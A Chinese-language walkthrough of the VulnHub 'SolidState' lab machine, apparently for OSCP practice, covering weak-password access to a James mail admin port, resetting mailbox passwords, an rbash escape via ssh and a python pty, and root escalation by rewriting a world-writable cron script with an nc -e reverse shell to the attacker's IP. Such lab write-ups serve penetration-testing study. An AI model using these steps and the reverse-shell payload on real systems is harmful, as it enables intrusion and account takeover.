Vuln靶机SolidState

【oscp】SolidState,计划任务提权

靶场地址:https://www.vulnhub.com/entry/solidstate-1,261/

发布日期:2018年9月12日

目标:得到root权限&找到flag.txt

主机探测,端口扫描

image-20250123154328877

一些端口介绍:

(22,80忽略)

25 端口:SMTP服务,用于发送电子邮件的协议

110 端口:pop3是用于接收电子邮件的协议

119 端口:是用于传输和读取Usernet新闻组文章的协议。

4445 端口:是 JAMES 邮件服务器的远程管理接口,允许管理员通过命令行或Web界面管理邮件服务器的配置,包括用户管理、域名管理、邮件箱管理等。

访问网页

image-20250124160541496

目录扫描

image-20250124161223187

这里是需要用到一个命令,来连接邮件服务器,指定好端口4555,然后使用弱口令root / root 进行登录,再使用help查看命令帮助

telnet 是一个用于远程登录和管理服务器的网络协议和命令行工具。它允许用户通过网络连接到远程主机,并在该主机上执行命令。telnet 通常使用端口 23 进行通信,但也可以指定其他端口。

image-20250124161338225

listusers 用于显示现有的账户信息,但是我们不知道密码信息,就无法登录pop3邮件服务器,查看电子邮件内容

user: james
user: thomas
user: john
user: mindy
user: mailadmin

设置(重置)密码

setpassword james 123
setpassword thomas 123
setpassword john 123
setpassword mindy 123
setpassword mailadmin 123

image-20250124163146464

登录我们的pop3服务器,用户james的邮件信息

image-20250124163537163

同理其他用户都这样查看,下面是john的邮件内容

image-20250124171652783

下面是mindy用户的第二封邮件

image-20250124171905704

翻译一下看看,这个就是 mindy 用户的ssh密码了

image-20250124171950307

username: mindy
pass: P@55W0rd1!2@

ssh登录后,但是发现系统对这个用户做出了命令执行的一些限制

image-20250124172249617

当前目录下有一个user.txt,包含了一个hash值,

image-20250124172419688

使用hash-identifierhash识别工具,识别这个加密的类型,但是没有识别到

image-20250124172518920

尝试逃逸shell,其他详细的逃逸过程可以参考我这篇文章

https://mp.weixin.qq.com/s/YS3lNhIE5V5kFlBLxS49xA

image-20250124173535335

这里的逃逸是要用到 python

ssh username@IP  "export TERM=xterm;python -c  'import pty;pty.spawn("/bin/bash")'"

image-20250124174309567

信息收集

uname -a
cat /etc/os-release   # 没有lsb_release -a命令可以使用这个代替

image-20250124174510070

查看计划任务

cat /etc/crontab

image-20250124175152224

查看文件权限为777的文件信息,不是root用户也能修改并执行文件,那如果这是个root用户设置的一个定时程序呢?

image-20250124183241552

查看py脚本内容

image-20250124184041504

看看nc 有没有-e参数,结果是有的

nc 中的 -e 参数在 Netcat (nc) 中用于指定一个程序,使得 Netcat 在建立连接后执行该程序,并将 Netcat 的标准输入、输出和错误重定向到该程序。这个参数通常用于创建反向shell或监听shell。

image-20250124184643448

那么py脚本的内容就如下,来反弹shell

#!/usr/bin/env python
import os
import sys
try:
     os.system('nc 192.168.209.130 6666 -e /bin/bash')
except:
     sys.exit()

注意:如果重定向了,过了一会儿没有反弹成功,要么重新连接一次,就像这样

image-20250124190637329

这下就能反弹成功了,找到root.txt文件

image-20250124190709442

如果直接执行py文件的话,是以当前用户执行的,例如

image-20250124191049825

可以看到当前用户为 mindy

image-20250124191040149

往期推荐

红日靶场3,joomla渗透,海德拉SMB爆破,域内5台主机横向移动教学

Linux 32位Crossfire游戏缓冲区溢出

独立开发零显卡AI引擎!媲美DeepSeek,附源码

【oscp】Tr0ll 靶机全系列(1-3),FTP被玩坏了

神器分享 红队快速打点工具-DarKnuclei

从零开始学SQL注入(sql十大注入类型):技术解析与实战演练

【渗透测试】DC1~9(全) Linux提权靶机渗透教程,干货w字解析,建议收藏

【渗透测试】12种rbash逃逸方式总结

利用MySQL特性,WAF绕过技巧

SQL注入绕过某狗的waf防火墙,这一篇就够了,6k文案超详细

本站内容部分转载于互联网,并不代表本站立场!如若本站内容侵犯了原著者的合法权益,可联系我们进行处理! 拒绝任何人以任何形式在本站发表与中华人民共和国法律相抵触的言论!
THE END
喜欢就支持一下吧
点赞20 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容